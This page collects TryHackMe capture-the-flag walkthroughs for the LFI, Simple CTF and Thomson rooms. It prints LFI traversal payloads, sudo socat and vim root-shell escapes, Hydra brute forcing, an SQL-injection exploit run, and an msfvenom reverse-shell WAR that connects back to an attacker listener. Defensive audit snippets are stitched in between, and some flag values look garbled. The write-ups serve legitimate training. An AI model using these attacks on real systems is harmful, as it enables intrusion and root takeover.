I will be available at twitter user6825

Conclusion

I believe you enjoyed today’s box, Lian_Yu on TryHackMe, and learned new concepts like fuzzing, steganography and related tools. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box, Daemon. Thanks.

Hack LFI Inclusion on TryHackMe

Today I am going to take you through a beginner level room on TryHackMe. From the name “LFI” itself we can understand what this box is all about.

First things first, make sure you are connected to the TryHackMe VPN and have deployed the machine.

kali@kali:~$ sudo openvpn WebExercise.ovpn
[sudo] password for kali:
Sat Jul 25 2020 OpenVPN 2.4.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Apr 21 2020
Sat Jul 25 2020 library versions: OpenSSL 1.1.1g 21 Apr 2020, LZO 2.10
Sat Jul 25 2020 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
Sat Jul 25 2020 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
Sat Jul 25 2020 TCP/UDP: Preserving recently used remote address:
Sat Jul 25 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Sat Jul 25 2020 UDP link local: (not bound)

[Screenshot: Active Machine Information; Title: inclusion, IP Address: 10.10.244.98, Expires in 59m 56s]

Once the machine is deployed, the next step is to ping the TryHackMe machine to make sure it is reachable.

$ ping 10.10.244.98
PING 10.10.244.98 (10.10.244.98) 56(84) bytes of data.
64 bytes from 10.10.244.98: icmp_seq=1 ttl=63 time=213 ms
64 bytes from 10.10.244.98: icmp_seq=2 ttl=63 time=195 ms
64 bytes from 10.10.244.98: icmp_seq=3 ttl=63 time=169 ms
64 bytes from 10.10.244.98: icmp_seq=4 ttl=63 time=229 ms
64 bytes from 10.10.244.98: icmp_seq=5 ttl=63 time=207 ms

Now everything is ready. Let’s start our hacking!

Step-1

The first step is always to start with a basic Nmap scan: nmap <target IP>

kali@kali:~$ nmap 10.10.244.98
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 00:23 EDT
Nmap scan report for 10.10.244.98
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

From the scan output, we understood there were two services running, on ports 22 and 80. Let’s explore the HTTP service in the browser.

[Screenshot: http://10.10.244.98/ shows a blog home page: “Hello, world! Welcome to my blog. This is currently in its early stage but you can find some articles that I've wrote. Learn more »”]

The blog explains different attacks like Local File Inclusion and Remote File Inclusion. Let’s click “View details” on the LFI-attack card.

[Screenshot: the LFI-attack card reads: “Local file inclusion attack is the one using which you can include any local file i.e all the files that are present on the server if the permission is right on the file. The most common file on unix that we can check for is /etc/passwd”, with a “View details »” link]

When we viewed the details, we found a few examples of the LFI attack.

Kali Linux 
Kali Training 
10.10.244.98 
larticle?name=lfiattack 
NetHunter n Offensive Security •S Exploit-DB 
Kali Tools •b Kali Docs 
Kali Forums 
GHDB n MSFU 
An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement. Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI). The following is an example of PHP code that is vulnerable to LFI.

/**
 * Get the filename from a GET input
 * Example - http://example.com/?file=filename.php
 */
$file = $_GET['file'];

/**
 * Unsafely include the file
 * Example - filename.php
 */
include('directory/' . $file);

In the above example, an attacker could make the following request. It tricks the application into executing a PHP script such as a web shell that the attacker managed to upload to the web server.

http://example.com/?file=../../uploads/evil.php

In this example, the file uploaded by the attacker will be included and executed by the user that runs the web application. That would allow an attacker to run any server-side malicious code that they want. This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file.

Directory Traversal

Even without the ability to upload and execute code, an LFI vulnerability can still be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows:

http://example.com/?file=../../../../etc/passwd

In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack.

Taken from https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/
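Two defensive counterparts to the PHP sample above, written here in Python as an added example (not code from the original post or from Acunetix): resolve_include is the hardened form of include('directory/' . $file), and find_traversal_requests flags traversal payloads, including URL-encoded and double-encoded ones, in web server access logs. The log lines and the BASE_DIR path are constructed for the example.

```python
import os
import re
import urllib.parse
from typing import List, Optional, Tuple

# Constructed sample of Apache access.log lines (not real captured traffic):
# one normal request and three carrying the traversal payloads discussed above.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [25/Jul/2020:10:20:01 +0530] "GET /?file=about.php HTTP/1.1" 200 512
10.0.0.9 - - [25/Jul/2020:10:21:14 +0530] "GET /?file=../../../../etc/passwd HTTP/1.1" 200 2301
10.0.0.9 - - [25/Jul/2020:10:21:30 +0530] "GET /?file=..%2F..%2Fuploads%2Fevil.php HTTP/1.1" 200 88
10.0.0.9 - - [25/Jul/2020:10:22:02 +0530] "GET /?file=%252e%252e%2Fetc%2Fpasswd HTTP/1.1" 403 0
"""

# Assumed include directory; stands in for the 'directory/' prefix in the PHP sample.
BASE_DIR = "/var/www/app/directory"

# Only a bare file name ending in .php is accepted: no '/', '\\' or '..' at all.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.php")


def resolve_include(base_dir: str, user_file: str) -> Optional[str]:
    """Hardened counterpart of include('directory/' . $file).

    Returns the absolute path to include, or None when the request must be
    refused. The name check stops traversal; the realpath containment check
    additionally stops a symlink inside base_dir from pointing outside it.
    """
    if not user_file or os.path.isabs(user_file) or "\x00" in user_file:
        return None
    if not SAFE_NAME.fullmatch(user_file):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_file))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# Common log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal_requests(log_text: str) -> List[Tuple[str, str, str, int]]:
    """Return (client ip, parameter, decoded value, status) for every query
    parameter that contains '../', '..\\' or an absolute path."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m["target"]).query
        for name, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
            decoded = decode_fully(value)  # parse_qsl already removed one layer
            if "../" in decoded or "..\\" in decoded or decoded.startswith("/"):
                hits.append((m["ip"], name, decoded, int(m["status"])))
    return hits
```

Note that the 403 on the last sample line still counts as a hit: a blocked traversal attempt is worth alerting on even when the server refused it.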

We can also check whether the website is vulnerable to LFI by pasting the traversal example above into the URI:

[Screenshot: the browser at 10.10.244.98 with the traversal payload in the URI, displaying the target's /etc/passwd]

Here we go! We were able to read the passwd file. From it we understood that the password of the user “falconfeast” is mentioned in the passwd file itself, i.e. “rootpassword”.

messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:rootpassword
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

Step-2

Now that we have the username and password, let's try SSH.

ssh ssh falconfeast@10.10.244.98
ssh: Could not resolve hostname ssh: Name or service not known
ssh falconfeast@10.10.244.98
The authenticity of host '10.10.244.98 (10.10.244.98)' can't be established.
ECDSA key fingerprint is
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.244.98' (ECDSA) to the list of known hosts.
falconfeast@10.10.244.98's password:
Permission denied, please try again.
falconfeast@10.10.244.98's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

System information as of Sat Jul 25 10:23:46 IST 2020

Here we go! We got access to a shell. As a first step we checked the ID; the user is also part of the sudo group.

falconfeast@inclusion:~$ id
uid=1000(falconfeast)
falconfeast@inclusion:~$

Let's see which files or programs falconfeast can run as a sudo user.

From the output we learned that no password is required to run /usr/bin/socat. In such cases we normally look up the binary in GTFOBins. For more info see https://gtfobins.github.io/

Step-3

Let’s look for /usr/bin/socat in the GTFO bins.

[Screenshot: the GTFOBins home page (3,046 stars), which describes the project as follows]

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks. This was inspired by the LOLBAS project for Windows. GTFOBins is a collaborative project created by Emilio Pinna and Andrea Cardaci where everyone can contribute with additional binaries and techniques.

We have to search for socat in GTFOBins.

[Screenshot: the GTFOBins entry for the socat binary, listing its functions]

We selected the “Shell” function, because with it we can spawn a root shell.

Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
The resulting shell is not a proper TTY shell and lacks the prompt.
socat stdin exec:/bin/sh

We copied the command and executed it with sudo:

falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)

Here we go! We got a shell as the root user. Now check the present working directory and list all the directories in it.

pwd 
/home/falconfeast

Using the ls command we found that there is a text file “user.txt”. Using the cat command we viewed the content of user.txt.

ls
articles
user.txt
cat user.txt
60989655118397±45799

We've got the answer to the first question in TryHackMe.

Similarly, we need to find the root flag, so switch to the root directory.

cd /root
pwd
/root
ls
root.txt
cat root.txt
42964104845495153909

Here we go! We've got the root flag and the answer to the second question in TryHackMe.

[Screenshot: TryHackMe answer box for the root flag, 42964104845495153909, marked Correct Answer]

Conclusion

I hope you enjoyed today's box, LFI on TryHackMe, and learned something new. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box, falconfeast. Thanks.

Simple CTF – TryHackMe

Today I am going to take you through how to crack a simple CTF box in TryHackMe. Though the challenge name is Simple CTF, it is not that simple, and we are going to learn why it is not that simple and how we can solve the challenge.

In this particular challenge there are 10 questions, and we are going to solve them one by one.

Step-1

As usual, make sure you are connected to the TryHackMe VPN.

sudo openvpn WebExercise.ovpn

[Screenshot: OpenVPN 2.4.9 (OpenSSL 1.1.1g, LZO 2.10) log output dated Wed Jul 22 2020, showing the control channel authentication and the UDP link being established]

Now deploy the machine in TryHackMe and note down the IP address. If the machine expires, you can extend it by clicking “Add 1 hour”.

[Screenshot: Active Machine Information: Title EasyCTF, IP Address 10.10.174.106, Expires 59m 24s, Add 1 hour]

Once the system is deployed, ping the TryHackMe machine from our machine.

ping 10.10.174.106
PING 10.10.174.106 (10.10.174.106) 56(84) bytes of data.
64 bytes from 10.10.174.106: icmp_seq=1 ttl=63 time=171 ms
64 bytes from 10.10.174.106: icmp_seq=2 ttl=63 time=155 ms
64 bytes from 10.10.174.106: icmp_seq=3 ttl=63 time=220 ms
64 bytes from 10.10.174.106: icmp_seq=4 ttl=63 time=206 ms

Step-2

Now we are good to go! Let's find out which services and ports are open on the remote machine using the Nmap scanner. Use a basic nmap scan:

nmap <ip address of the target system>

nmap -A <ip address of the target system>

From the nmap scan we got the answers to the 1st and 2nd TryHackMe questions.

Step-2

Since port 80 is open, let's explore the HTTP service in the web browser. We didn't get any useful information other than the Apache2 Ubuntu default page.

Step-3

Now let's start “Gobuster”. Gobuster is a tool used to brute-force URIs (directories and files) on web sites and DNS subdomains (with wildcard support).

gobuster dir -u http://10.10.174.106 -w /usr/share/dirb/wordlists/common.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://10.10.174.106
[+] Threads:
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/07/22 Starting gobuster
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)
2020/07/22 Finished

From Gobuster we understood that there is a URI directory called “/simple”.

Step-3

Now let's open /simple in the web browser, as shown in the screenshot:

[Screenshot: http://10.10.174.106/simple/ in the browser, showing a “CMS Made Simple” site]

We understood that a Content Management System (CMS) is running. Many CMSs have known vulnerabilities, so let's search Google for CVEs and Exploit-DB entries.

When we Googled it, we found that CMS Easy is vulnerable to SQL injection.

We need to find the login page of the CMS so that we can make use of the above mentioned exploit. We searched for the login page URI and found it.

[Screenshot: a search result showing the CMS Made Simple login page on another host at /cmsms/admin/login.php]

Putting the target's IP address in place of the domain name in that URL gave us the exact login page.

[Screenshot: http://10.10.174.106/simple/admin/login.php, the “Login to CMS Made Simple” page with User name, Password, Submit, Cancel and “Forgot your password?”]

We’ve got the answer for the 3rd question in TryHackMe

Step-4

Now we need to run the exploit. First we have to download it; since it is written in Python, we need Python on our local system.

The exploit is written for Python 2. To run it on the latest version of Python we need to make some minor changes to the code. If you are good at Python you can modify it yourself; otherwise you can use an online Python converter.

[Screenshot: pythonconverter.com, “Automated Python 2 to 3 code translation!”, with the exploit's Python 2 source on the left and the converted Python 3 code on the right]

We’ve uploaded the Python 2 version and the program got converted into Python 3.

We’ve got answer for the 4th question in TryHackMe.

Step-5

The Python code brute-forces the username. We executed the command shown in the screenshot, using the wordlist “rockyou.txt”, which is available by default on a Kali Linux machine.

root@kali:/home/kali/Desktop# python3 4663.py -u http://10.10.220.25/simple/ --crack -w /usr/share/wordlists/rockyou.txt

Once the exploit ran, we got the result below, i.e. the username “mitch”.

Salt for password found: 1dac0d92e9fa6bb2
Username found: mitch
Email found: admin@admin.com
Now try to crack password
Traceback (most recent call last):
  File "4663.py", line 184, in <module>
    crack_password()
  File "4663.py", line 53, in crack_password
    for line in dict.readlines():
  File "/usr/lib/python3.8/codecs.py", line 322, in decode
    (result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 942: invalid continuation byte
root@kali:/home/kali/Desktop#

Step-5

Knowing the username, the next step is to find the password. To do that we are going to brute-force SSH using a tool called “Hydra”.

Again rockyou.txt is used as the password list. The syntax of the brute-force command is shown in the screenshot.

The outcome of the brute force is the password, and we got it as “secret”.

We’ve got answer for the 5th question in TryHackMe

Now we have both username and password, so we can try for ssh login.

root@kali:/home/kali/Desktop# ssh mitch@10.10.220.25 -p 2222
The authenticity of host '[10.10.220.25]:2222' can't be established.
ECDSA key fingerprint is SHA256:
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.220.25]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.220.25's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

packages can be updated.
updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190

We’ve got answer for the 6th question in TryHackMe.

Through SSH we got a shell as the normal user “mitch”. To list the contents of the present working directory we used “ls” and found the user.txt file; to view its content we used the cat command, as shown below.

$ whoami
mitch
$ pwd
/home/mitch
$ ls
user.txt
$ cat user.txt
Good 306, keep

We’ve got answer for 7th & 8th question in TryHackMe

Step-6

The next step is to find the flag in the root folder. For that we need to escalate our privileges to root; only then can we access the root folder.

Let's try sudo -l to identify what the current user is allowed to run with sudo.

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

The current user has sudo permission to run vim, located in /usr/bin/.

Now it's time to check GTFOBins: https://gtfobins.github.io/

GTFOBins provides a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It is one of the easiest ways to find binaries that can be used to escalate privileges.
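Both boxes turned on a sudo rule (socat here, vim above) that GTFOBins lists as shell-capable. The following is an added example, not the post's code, of the audit a defender would run over `sudo -l` output: parse the rules and flag unrestricted or shell-capable entries, with NOPASSWD raising the severity. The sample output is constructed, and the SHELL_CAPABLE set holds only the two binaries from these write-ups; a real audit extends it from the GTFOBins sudo section.

```python
import os
import re
from typing import Dict, List

# Constructed `sudo -l` output in the format shown in these write-ups
# (a made-up host, not one of the TryHackMe boxes).
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/socat, /usr/bin/apt-get
    (ALL : ALL) ALL
"""

# Binaries the GTFOBins sudo section flagged in these write-ups; extend from
# https://gtfobins.github.io/ for a real audit.
SHELL_CAPABLE = {"socat", "vim"}

# One rule line: "(runas) [TAG: ...] command[, command ...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Parse the rule lines that follow 'User X may run the following commands'."""
    rules: List[Dict[str, object]] = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m["runas"].strip(),
                              "nopasswd": "NOPASSWD" in tags,
                              "command": cmd})
    return rules


def risky_rules(rules: List[Dict[str, object]]) -> List[Dict[str, str]]:
    """Flag rules that hand out a root shell: unrestricted 'ALL' and
    shell-capable binaries, with NOPASSWD raising the severity."""
    findings: List[Dict[str, str]] = []
    for r in rules:
        cmd = str(r["command"])
        if cmd == "ALL":
            findings.append({"command": cmd, "severity": "high",
                             "reason": "any command as %s" % r["runas"]})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in SHELL_CAPABLE:
            severity = "high" if r["nopasswd"] else "medium"
            findings.append({"command": cmd, "severity": severity,
                             "reason": "%s can spawn a shell (GTFOBins)" % binary})
    return findings
```

The fix on both boxes is the same: drop the rule, or restrict it to a wrapper that cannot reach a shell, rather than granting the editor or relay binary itself.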

gtfobins.github.io/gtfobins/vim/#sudo
Sudo
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.
sudo vim -c ':!/bin/sh'

We used the same command as mentioned in GTFOBins to spawn the shell, and we got root access.

$ sudo vim 
# whoami 
root

We’ve got answer for the 9th question in TryHackMe

First we used the command “pwd” to see the present working directory, then we switched to the root folder using “cd”. In the root folder we found a root.txt file, and again we used the cat command to view its content.

# pwd
/home/mitch
# cd /root
# ls
root.txt
# cat root.txt
W3ll d0n3. You made

Here we go! We've got the root flag, and with it the answer to the 10th TryHackMe question.

Conclusion

I believe you enjoyed the cracking procedure of the Simple CTF box and learned something new today. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box, MrSeth6797. Thanks.

Thomson – TryHackMe

Today, I am going to take you through a simple CTF challenge related to Tomcat.

What is Tomcat?

Apache Tomcat is an open source implementation of the Java Servlet and Java Server Pages technologies. Tomcat is used to power a wide range of applications and websites across the Internet.

What is TryHackMe ?

TryHackMe is an online platform for learning and teaching cyber security, all through your browser. For more info visit tryhackme.

Let’s Capture the Flag

Step-1

First and foremost, check the connectivity between your machine and the THM machine. If ping works, the next step is to start the Nmap scanner.

nmap -A <IP address>

From the Nmap scan we understood that three services were running: SSH on port 22, Apache Tomcat on port 8080, and port 8009, which is also related to Tomcat.

Step-2

Since port 8080 is open and Apache Tomcat is running on it, let's open it in the web browser.

We got the Apache Tomcat default page. Clicking “Server Status” prompts for a username and password. Since we don't know them, we click cancel, and the page shown below appears. In it we can see the username “tomcat” and password “s3cret”.

401 Unauthorized

You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation.

For example, to add the manager role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>

Step-3

We now have the example username and password for the manager. Let's try them on the login page. With those credentials we got access to the server configuration pages. This is a misconfiguration: the administrator set up the manager account exactly as the example shows, without changing the username and password.

We also found an option to upload a “WAR file”. In software engineering, a WAR file (Web Application Resource) is a file used to distribute a collection of JAR files, JavaServer Pages, Java Servlets, Java classes, XML files, tag libraries, static web pages (HTML and related files) and other resources that together constitute a web application.

If we can upload a WAR file, we can build our own payload with msfvenom in .war format; when the deployed .war is run, we get a reverse shell.
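The misconfiguration above lives entirely in conf/tomcat-users.xml, so it can be caught by auditing that file. The following Python is an added example (not the post's or Tomcat's code) that parses a tomcat-users.xml and flags the example credentials from the 401 page, short passwords on roles that can deploy a WAR, and passwords shared between accounts. The XML sample is constructed; only the tomcat/s3cret pair comes from the page.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List

# Constructed tomcat-users.xml (not the file from the TryHackMe box). The first
# user is exactly the example the 401 page prints; the other two are invented.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="x7Qe!vR2pL9mZt4c" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="probe"/>
</tomcat-users>
"""

# The credential pair Tomcat's own 401 page suggests, as seen in this write-up.
DOCUMENTED_DEFAULTS = {("tomcat", "s3cret")}
# Manager roles that can deploy a WAR (code execution as the Tomcat user).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MIN_PASSWORD_LEN = 12


def local_name(tag: str) -> str:
    """Strip the XML namespace Tomcat puts on every element."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> Dict[str, List[str]]:
    """Return {username: [finding, ...]} for accounts that need attention."""
    root = ET.fromstring(xml_text)
    users = [el for el in root.iter() if local_name(el.tag) == "user"]

    # Index accounts by password so reuse across accounts can be reported.
    by_password: Dict[str, List[str]] = defaultdict(list)
    for el in users:
        by_password[el.get("password", "")].append(el.get("username", ""))

    findings: Dict[str, List[str]] = {}
    for el in users:
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        problems: List[str] = []
        if (name, password) in DOCUMENTED_DEFAULTS:
            problems.append("uses the example credentials from the 401 page")
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy and len(password) < MIN_PASSWORD_LEN:
            problems.append("short password on a role that can deploy a WAR: %s" % ", ".join(deploy))
        others = [u for u in by_password[password] if u != name]
        if others:
            problems.append("password shared with %s" % ", ".join(others))
        if problems:
            findings[name] = problems
    return findings
```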

[Screenshot: the Tomcat manager at http://10.10.12.115:8080/manager/html/list, with the “Deploy” section: Context Path (required), XML Configuration file URL, WAR or Directory URL, and “WAR file to deploy” with a Browse... button]

Step-4

Using msfvenom we built the payload. To get a reverse shell we set LHOST and LPORT to our machine's IP address and port number.

root@kali:/home/kali# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.81.64 LPORT=4444 -f war > shell.war
Payload size: 1099 bytes
Final size of war file: 1099 bytes
root@kali:/home/kali#

Once the file is generated, upload “shell.war”. Also start netcat listening on port 4444, so that when we open the deployed shell (see step-3) the reverse shell connection is established.

[Screenshot: the Tomcat manager application list now showing the deployed “shell” context with Start, Stop, Reload and Undeploy buttons, above the “Deploy directory or WAR file located on server” and “WAR file to deploy” forms]

Step-5

After uploading the file, when we clicked the shell context, we got the reverse shell.

nc -lvp 4444
listening on [any] 4444 ...
10.10.186.167: inverse host lookup failed: Unknown host
connect to [10.8.81.64] from (UNKNOWN) [10.10.186.167] 35720

Once we had the reverse shell, we moved to the “home” directory. Using ls we saw there is a user called “jack”; listing the contents of his directory, we found the text file “user.txt”.

$ cd home
$ ls
jack
$ cd home
/bin/sh: 11: cd: can't cd to home
$ cd jack
$ ls
id.sh
test.txt
user.txt

To see the content of the user.txt file, we have used “cat” command.

$ cat user.txt
39400c90bc683a41a8935e4719f181bf

Also we’ve answered the TryHackMe first question

[Screenshot: TryHackMe answer box for user.txt, 39400c90bc683a41a8935e4719f181bf, marked Correct Answer]

Step-6

To answer the second question we need to escalate our privileges to root; only then can we read the root folder.

Let's find out what files are in the current working directory by running “ls -al”, which lists all files including hidden ones. We found the file id.sh, on which everyone, not only jack, has read/write/execute permission (-rwxrwxrwx).

[Screenshot: output of ls -al in /home/jack (total 48), listing .bash_history, .bash_logout, .bashrc, .cache, id.sh (-rwxrwxrwx, 26 bytes, Aug 14 2019), .nano, .profile, .sudo_as_admin_successful, test.txt, user.txt and .wget-hsts]

Usually the flag is located in the root directory, and from TryHackMe we know the file containing it is root.txt. This is a little tricky, but since id.sh is world-writable and evidently run with root privileges, let's use echo to write a command into it that copies root.txt into the present working directory, i.e. jack's home.

tomcat@ubuntu:/home/jack$ echo "cp /root/root.txt /home/jack/root.txt" > id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cp /root/root.txt /home/jack/root.txt

The echo command succeeded, and once id.sh ran, root.txt was copied into the present working directory. We checked with “ls” and found root.txt, then used “cat” to see its content.

Here we go, we've got the root user flag.

tomcat@ubuntu:/home/jack$ ls
id.sh  root.txt  test.txt  user.txt
tomcat@ubuntu:/home/jack$ cat root.txt

We’ve also got the answer for the 2nd question in TryHackMe.

[Screenshot: TryHackMe answer box for root.txt, d89d5391984c0450a95497153ae7G3a, marked Correct Answer]

Conclusion

We have successfully completed the Thomson boot2root machine from the FIT and BSides Guatemala CTF challenge. I would like to thank TryHackMe and Stuxnet, who created this amazing CTF challenge. Keep it up! Once again, I hope you enjoyed the walkthrough. See you soon!
